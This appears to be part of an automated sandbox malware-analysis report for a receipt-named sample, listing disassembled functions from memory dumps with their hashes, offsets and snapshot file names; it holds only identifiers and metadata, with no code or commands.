                • API String ID:
                • Opcode ID: 6d85cdbbaef6e360442abcba85f87bd97b3427968e7414a2de3168411037a9b0
                • Instruction ID: cf5814fa17cbfeb9d25b73412218f6bf0428ea17c4d58596bb3b9eaf284d775a
                • Opcode Fuzzy Hash: 6d85cdbbaef6e360442abcba85f87bd97b3427968e7414a2de3168411037a9b0
                • Instruction Fuzzy Hash: 2B416F30A002099FC715EF68E890A9DBBE6FF88311F508529E515EB3A5DF34AD06CB81
                Function 068887F8 Relevance: .1, Instructions: 124COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8564067d47e7e12a6685c1ba10018962f3e223f29959a8e4d0da9448bd52d0f6
                • Instruction ID: 02762004b12a2372c6423ed3108275c125e0aa31266eba6088caa7ce8812b58a
                • Opcode Fuzzy Hash: 8564067d47e7e12a6685c1ba10018962f3e223f29959a8e4d0da9448bd52d0f6
                • Instruction Fuzzy Hash: 99410275B0060A8FCB50EB69D98082EBBA6FFC4350B558476D609CB361DB30EC06C7A1
                Function 068669F0 Relevance: .1, Instructions: 122COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4aaaefde91a645a4101877db26714cf496ccbcffa1d6af969d6bef153cb9a07e
                • Instruction ID: 3b85c2f47d34b35ce3684d2c483e3138d4693da38bd2ce24b32de7b03ffabc03
                • Opcode Fuzzy Hash: 4aaaefde91a645a4101877db26714cf496ccbcffa1d6af969d6bef153cb9a07e
                • Instruction Fuzzy Hash: CE416D35A0020AAFCB04DF58D844AAEFBB9FF48314F108229E515EB251D771ED96CBD1
                Function 08501F1F Relevance: .1, Instructions: 119COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2b4d76b946dc1b5b56f390527eb24218ee15ed552a34fb67af7c794b9b11f615
                • Instruction ID: 9e7825bd5f2b8b705fbd089b711216a14fe07a2f0ac3ef266c9187444b8567c6
                • Opcode Fuzzy Hash: 2b4d76b946dc1b5b56f390527eb24218ee15ed552a34fb67af7c794b9b11f615
                • Instruction Fuzzy Hash: 44412E74E0021A8FCB05DFA8C984AAEBBF2FF88305F158565D505AB395D734D942CFA1
                Function 06C72DF0 Relevance: .1, Instructions: 119COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fa235cb97483403922652170bd3212f34c29918b5dd1e47d9ff9980132b713ab
                • Instruction ID: bc4099aceb67b06d671e5d51b905fded84593009ce7f4ae179bd43bda0e0e39e
                • Opcode Fuzzy Hash: fa235cb97483403922652170bd3212f34c29918b5dd1e47d9ff9980132b713ab
                • Instruction Fuzzy Hash: CE4128347006008FD758DF6AC884E2AB7EAFF89211B1545ADE54ACB772CB34ED81CB90
                Function 08500448 Relevance: .1, Instructions: 118COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b37435901eb3d5a904542d7de7741178ccb18939f234db3a1a260e2d319c6c1f
                • Instruction ID: dd64b1190c2a5fbc3523c70b271110a493b031390e793598b09d7f512df91c8c
                • Opcode Fuzzy Hash: b37435901eb3d5a904542d7de7741178ccb18939f234db3a1a260e2d319c6c1f
                • Instruction Fuzzy Hash: 604138342007009FD315AB38E454A6EB7AAFF84200B54892CD54A9B7A9DB79FD4ACB91
                Function 0686BF17 Relevance: .1, Instructions: 117COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fc132b3c194f8f49bc1383609c3d64fb641baf6510f556ec587707ae17997714
                • Instruction ID: ecbacedc3e3c82cf8d02a53b23277c6e22a580aa5c5cb7cbce950ad40cf35bf3
                • Opcode Fuzzy Hash: fc132b3c194f8f49bc1383609c3d64fb641baf6510f556ec587707ae17997714
                • Instruction Fuzzy Hash: A4510574A00209EFDB05CF99D584A9DBBB6FF88314F248558E804AB365C775ED86CB90
                Function 06C756E7 Relevance: .1, Instructions: 117COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 45e650c1e0b1338ca43e44a8d19550661b138ec733cd377cd728d5d6c57f408f
                • Instruction ID: 3de814f5bbf530f53464890a5e7bae3c10c02fa52a43248b7389fddf883e7abd
                • Opcode Fuzzy Hash: 45e650c1e0b1338ca43e44a8d19550661b138ec733cd377cd728d5d6c57f408f
                • Instruction Fuzzy Hash: B7510D34A00209DFDB45CFA8D584A9DFBB6FF88310F648559E805AB365CB35ED82CB90
                Function 0850A3F7 Relevance: .1, Instructions: 115COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 475dea3859edeb6eaa25c772f7c958cd8f98d57b698705b85d469c7eeaf9649a
                • Instruction ID: 5762856c82ee0ffa3dc067a3e94d5d5572b876f3052380f4f54acf6fac16b375
                • Opcode Fuzzy Hash: 475dea3859edeb6eaa25c772f7c958cd8f98d57b698705b85d469c7eeaf9649a
                • Instruction Fuzzy Hash: 5551D634A00219EFDB05CF98D584A9DBBB6FF88314F288559E405AB365C735ED82CF90
                Function 06C782B0 Relevance: .1, Instructions: 112COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6213cb8fd88e2594b1501049b3783380f18c41c5d1e5fedff9db0062da2060db
                • Instruction ID: fb408d8e2ef4d02d2820824f9db135a15d635621cc5c1fe4d7c2c3cfdbff6141
                • Opcode Fuzzy Hash: 6213cb8fd88e2594b1501049b3783380f18c41c5d1e5fedff9db0062da2060db
                • Instruction Fuzzy Hash: 4D418E30B042158FDB88EF7AC85857E7BA6AF882407504579D64AEB361EA34DD05C791
                Function 06883840 Relevance: .1, Instructions: 112COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9594c858365e88eb0a80b038ddd2f148c557a58652ebccaa6cbdad8a208c59cb
                • Instruction ID: ad9ac4162c37b18a7378afae7f9d9027f88f491e4fb186ee2da40d7ee6a4e915
                • Opcode Fuzzy Hash: 9594c858365e88eb0a80b038ddd2f148c557a58652ebccaa6cbdad8a208c59cb
                • Instruction Fuzzy Hash: 5C419F30A013059FD7A0AFA9C944B7FBBE5EF46B44F10492DE59AD7650DB34E881CBA0
                Function 06862C01 Relevance: .1, Instructions: 111COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8cb166620777d3b08ce0f6748bc9c2a3e120afdd83eb42097385d3f8595d6304
                • Instruction ID: 03144c93f8851c583c13d957f8883c2418018722b2c025e9df3dc6f0b8eecbc8
                • Opcode Fuzzy Hash: 8cb166620777d3b08ce0f6748bc9c2a3e120afdd83eb42097385d3f8595d6304
                • Instruction Fuzzy Hash: 06410734A00209EFDB45CF98D594A9DFBB2FF88310F248598E805AB365C735ED86CB90
                Function 0850B5EA Relevance: .1, Instructions: 109COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 199c6986dac75d4102a33e9b6a4329473f7f91a371f35ef9e811ad20325c8925
                • Instruction ID: 185c98b8df0376a0f9440d10f4b10377276a5d9f6f0ffdee1fead3299d1f559d
                • Opcode Fuzzy Hash: 199c6986dac75d4102a33e9b6a4329473f7f91a371f35ef9e811ad20325c8925
                • Instruction Fuzzy Hash: 32413B35B002148FCB04EBA8D494AAEB7F7FFC8250F244429D816A7395DF75AD42CB91
                Function 0686D8E0 Relevance: .1, Instructions: 105COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bcf4004dff5e8f44921fb0a6a2d3f0240e3e8f7b15aa0422d3e22bacb2347c0e
                • Instruction ID: 7063758e09656587392b58e6de4be32c4fbeed859146d615394719f36147cc2f
                • Opcode Fuzzy Hash: bcf4004dff5e8f44921fb0a6a2d3f0240e3e8f7b15aa0422d3e22bacb2347c0e
                • Instruction Fuzzy Hash: 5C413F30240B015BC759EF29D941A9EBBEAEF80300F448A3CE5968B765DA74F90EC795
                Function 06C7EDF6 Relevance: .1, Instructions: 104COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 39f155f4c03ba1efa7b7a17edfe98c37685228bb0a9972b5da058f43648582bf
                • Instruction ID: 0569f39656be2b2fd82ab46c5ce2cad985220da96a75232a6d85c9db14881820
                • Opcode Fuzzy Hash: 39f155f4c03ba1efa7b7a17edfe98c37685228bb0a9972b5da058f43648582bf
                • Instruction Fuzzy Hash: 6341F63290D3918FC7165FB89C5C12A7FB2EF4B21170849DFE592DB2A6DA348C85C7A1
                Function 06887306 Relevance: .1, Instructions: 104COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cc5a633dd1d4f33c229787fd27e402f39f9509415829a9792d589932856fe295
                • Instruction ID: fd7eb10b8b0f2ad117330f7cc79f76fdd7eeeb2527fbc6af47f5c1cda8326f27
                • Opcode Fuzzy Hash: cc5a633dd1d4f33c229787fd27e402f39f9509415829a9792d589932856fe295
                • Instruction Fuzzy Hash: B641F434E01209EFDB45DFA8D584A9DFBB2FF88304F248558E805AB365C775AD82CB80
                Function 068699CB Relevance: .1, Instructions: 100COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e9cbb163431da6a6bdc3c558027da1096a14e279aaacdf1b2435a4505d7bf793
                • Instruction ID: 23d16991ae7ce6a7780206ca55a00b1f9c7c461398a304fe6ea54b2e067eecea
                • Opcode Fuzzy Hash: e9cbb163431da6a6bdc3c558027da1096a14e279aaacdf1b2435a4505d7bf793
                • Instruction Fuzzy Hash: A241C434E01209AFDB45CFA9D584A9DFBF2AF88304F24C559E405AB3A5CB35ED46CB80
                Function 06C73D3B Relevance: .1, Instructions: 100COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9b548db97e6686132347631b8b960b3b2fe1a40e9958e3b22e30bc0643b4db25
                • Instruction ID: 3afff796b4486d9d7cd2709fb2a29263caf8f27a5e7910f0ec97b32efb482a1e
                • Opcode Fuzzy Hash: 9b548db97e6686132347631b8b960b3b2fe1a40e9958e3b22e30bc0643b4db25
                • Instruction Fuzzy Hash: 1E41D434E01249AFDB45DFA8D584A9DFBF2AF88304F24C558E409AB365CB35ED46CB90
                Function 06C79A9B Relevance: .1, Instructions: 100COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2ee4d542263ab505d0038b1ca5ec2bf0879aad54ec3bcc7590972290e6f6a480
                • Instruction ID: 45c9d4a45af4298b71214606fd371784e3eca8fb24c47c64f78f7f4e02b7839c
                • Opcode Fuzzy Hash: 2ee4d542263ab505d0038b1ca5ec2bf0879aad54ec3bcc7590972290e6f6a480
                • Instruction Fuzzy Hash: D041E134E01209EFDB45CFA8D584A9DFBB2AF88314F248158E405AB365CB35ED86CB80
                Function 06C759E8 Relevance: .1, Instructions: 100COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 295ee942cf8c2ff656f3d42ec183b3e9f63ccbccaad8dcd286a0fdae43252a56
                • Instruction ID: 30c94cd0a8d961c6fbeeeed9bdf00db325c6d5805f9f90ff252f84212bdf193d
                • Opcode Fuzzy Hash: 295ee942cf8c2ff656f3d42ec183b3e9f63ccbccaad8dcd286a0fdae43252a56
                • Instruction Fuzzy Hash: 25316D70B002169FCB55DF69C880ABEBBB6EF88310F548469D9099F295DB31DD41CBE0
                Function 085075FB Relevance: .1, Instructions: 97COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dd344fc65c388a24418e93fdc0815da0b32b76c9b6388824e151f355efc058f0
                • Instruction ID: 4c583f0d4bc3ec76db7e6e28531d12d062664dec399d9c2b020a523b28a30085
                • Opcode Fuzzy Hash: dd344fc65c388a24418e93fdc0815da0b32b76c9b6388824e151f355efc058f0
                • Instruction Fuzzy Hash: A73169397002119FCB05DF38D884A5E7BB6FF89341B008169E901DB3A6DB35ED45CB91
                Function 0850BA7B Relevance: .1, Instructions: 96COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ff7518ff5ccbb3c56a60bdd117414fa022c2b35b12ef6ff743e844f4bd8c7027
                • Instruction ID: 61074571a7916fdcce77a379a86748b5e1e521e58fa28891e82d70384be3c8e3
                • Opcode Fuzzy Hash: ff7518ff5ccbb3c56a60bdd117414fa022c2b35b12ef6ff743e844f4bd8c7027
                • Instruction Fuzzy Hash: 0E315935B002459FCB05DFA8D944AAEBBBAFF89211F14806AE505DB2A5CBB4CD41CB91
                Function 08507608 Relevance: .1, Instructions: 96COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 75c5e8c0acc269cf9ba7af33a489ae8c5ad149003d814b5535923f6cb6275f5d
                • Instruction ID: 56da02108847d5949d592aed83a5b88e005812e53e3c7577f096b28629246a0a
                • Opcode Fuzzy Hash: 75c5e8c0acc269cf9ba7af33a489ae8c5ad149003d814b5535923f6cb6275f5d
                • Instruction Fuzzy Hash: 763148397002119FCB05DF39D884A6E7BBAFF89341B108168E906DB3A5DB35ED45CB90
                Function 06C7D6F8 Relevance: .1, Instructions: 90COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 49ffa58175b3e4b725b0407a2d5ee287acae69633e7745993a2a8d8f4df9d841
                • Instruction ID: d5d85ea673b73e7660c963afcbef32e414e39c6c345f8356ad840de12823c68c
                • Opcode Fuzzy Hash: 49ffa58175b3e4b725b0407a2d5ee287acae69633e7745993a2a8d8f4df9d841
                • Instruction Fuzzy Hash: 05411574E01209DFCB05DFA9D940ADEBBF6FF88300F10846AE805A7365DB359946CB91
                Function 0850BA6E Relevance: .1, Instructions: 88COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5790ee48b3db1387a890a36d7d146ec6112a9f492d3dbbc152c832df988df6c3
                • Instruction ID: 976b75043e843f2c6a34d7580c20964fca2d37ff3fde901ce13928c5bb480250
                • Opcode Fuzzy Hash: 5790ee48b3db1387a890a36d7d146ec6112a9f492d3dbbc152c832df988df6c3
                • Instruction Fuzzy Hash: B6318B35B002459FDB05CFA8C894B7EBBBAFF88211F24845AE505EB2A5CB75CD41CB61
                Function 06885048 Relevance: .1, Instructions: 88COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 911c348584226e0faa541412d41b42a04aaa5fc3eb19f3850b81be5508623da7
                • Instruction ID: 129d6d0e2775fbe38bee6aca730d43e69383317c09341028290a8b4306d4f2ce
                • Opcode Fuzzy Hash: 911c348584226e0faa541412d41b42a04aaa5fc3eb19f3850b81be5508623da7
                • Instruction Fuzzy Hash: 7231C670A006409FD754EF68D89469EBBF6EF88300F04846DD00AE7756DB78AC06CB91
                Function 06C74548 Relevance: .1, Instructions: 87COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c68a214e04ec8b76a4a1734685be2d04b6284e7a9a8b5803521916d7cdc4f23e
                • Instruction ID: 6ddbbf1461c1b953b187638e5578b60027b3ed598c6b57e944f29d0ab342c8f2
                • Opcode Fuzzy Hash: c68a214e04ec8b76a4a1734685be2d04b6284e7a9a8b5803521916d7cdc4f23e
                • Instruction Fuzzy Hash: F921C2327013005FEB649B6AE844A5AFBEAEFC9325B18847EE54EC7761CA31EC41C750
                Function 06C7D708 Relevance: .1, Instructions: 86COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 11b69a067bb00d4ac75a53c1e3d791ee9bf8892ae7e053fb8f3f2077cf2a94dc
                • Instruction ID: f891a261d9e43c52147c4e80da4154b119dee49bc9d29155c6bae170d2568227
                • Opcode Fuzzy Hash: 11b69a067bb00d4ac75a53c1e3d791ee9bf8892ae7e053fb8f3f2077cf2a94dc
                • Instruction Fuzzy Hash: 5D31E474E00219DFCB05DFA9D944ADEBBF6FF88300F108429E805A7365DB35A946CB91
                Function 0686CC63 Relevance: .1, Instructions: 84COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8cf110b3a155f36203ede554de8c25a2cd6897e5526271a8a125f85b6a008b97
                • Instruction ID: a4fda6a81c6bc370ed0efce03e100356bc9ff2b30162e803fac423a8208ffd7a
                • Opcode Fuzzy Hash: 8cf110b3a155f36203ede554de8c25a2cd6897e5526271a8a125f85b6a008b97
                • Instruction Fuzzy Hash: 02214B316053808FC7995B3A985046BBFB6AFC721870541AEE6C6CB293DA34C807C762
                Function 06C7A60B Relevance: .1, Instructions: 84COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6eb9a21586e81a53228178d97796bfae3e0d8a54c6d2728a50ba4f6854d9b94d
                • Instruction ID: 14a20a460709a66c544347a1ff9bee0bcdb95e7fcfc8b6f368a496903dcbc60e
                • Opcode Fuzzy Hash: 6eb9a21586e81a53228178d97796bfae3e0d8a54c6d2728a50ba4f6854d9b94d
                • Instruction Fuzzy Hash: FE213A36B107104FEB24CB69C89157E7BF6EFC4210B28856AD546D73A5C734EB81CB61
                Function 0688C1AB Relevance: .1, Instructions: 84COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7239d7bd300a6edc9f61261939dbb35679945105a07198dd757695ea78d2ff2c
                • Instruction ID: 5f3625a2b92d83fa9d7b5a6bc2e9b5f81c49a0865ef58f0ab9579116344177d6
                • Opcode Fuzzy Hash: 7239d7bd300a6edc9f61261939dbb35679945105a07198dd757695ea78d2ff2c
                • Instruction Fuzzy Hash: D3313C796012109FCB05EF58D48896DBFBAFF88311B018455E81997361CB38DD81CFA1
                Function 0686D54B Relevance: .1, Instructions: 82COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0bdc966d320cb003bea9dbe0d66ec17eb5951d2e18dd0f56cc23ba2ef5951b03
                • Instruction ID: 35a3764fabf1efed041721f024911885d540cabdf61b65b8a88d3fb9eaad51c0
                • Opcode Fuzzy Hash: 0bdc966d320cb003bea9dbe0d66ec17eb5951d2e18dd0f56cc23ba2ef5951b03
                • Instruction Fuzzy Hash: D621F132B04355AFDB51DFAAD8449AEBBB5FF89214B14016AFA40EB610C730ED40CBE1
                Function 06888B90 Relevance: .1, Instructions: 82COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 62374b7b22a087f6dc353718dc2796c25fcf693281f12211d6c7d5c61d4cea1a
                • Instruction ID: 7be9c95d2b619dfc0c8c1d15d1778978f3521b8d2b92e458d1b18d3c47791908
                • Opcode Fuzzy Hash: 62374b7b22a087f6dc353718dc2796c25fcf693281f12211d6c7d5c61d4cea1a
                • Instruction Fuzzy Hash: BE218B757001108FD748AB3DD488A2E77EAEF8864475541B9EA0ACB375DA30DC41CB50
                Function 0686D6E0 Relevance: .1, Instructions: 81COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 51809e89b231ca46df43c95c7351d9ebe09a2a033b559d4fb0b7fd605c44b94b
                • Instruction ID: d4327e57faa276615defc0d2ca1ce625686e5044f237461e7ff272741335c676
                • Opcode Fuzzy Hash: 51809e89b231ca46df43c95c7351d9ebe09a2a033b559d4fb0b7fd605c44b94b
                • Instruction Fuzzy Hash: D6216D747002159FDB44AF69D814ABE7BB6FF88305F404429FD02EB381DB35AD518BA2
                Function 06C77719 Relevance: .1, Instructions: 81COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3c6b266163c2a2357d254f0556650e514d284f1fdb27ceec396bde34cc8bbb52
                • Instruction ID: 2dfef677710f5909a3edce6f3f322a72c37f0043897e33426b7d6890c2e3133b
                • Opcode Fuzzy Hash: 3c6b266163c2a2357d254f0556650e514d284f1fdb27ceec396bde34cc8bbb52
                • Instruction Fuzzy Hash: E031F274E00219DFCB05CFA9D980AEEBBF6FF88300F108429E405A7365DB359946CB91
                Function 06C77DB0 Relevance: .1, Instructions: 81COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b68165777f7c0d936ebcd015be8aa5579b109a307420918453f24ef31200660b
                • Instruction ID: eb38d12503de2f584f6044f389df90796f2a1752028ec66d9714bfe748917843
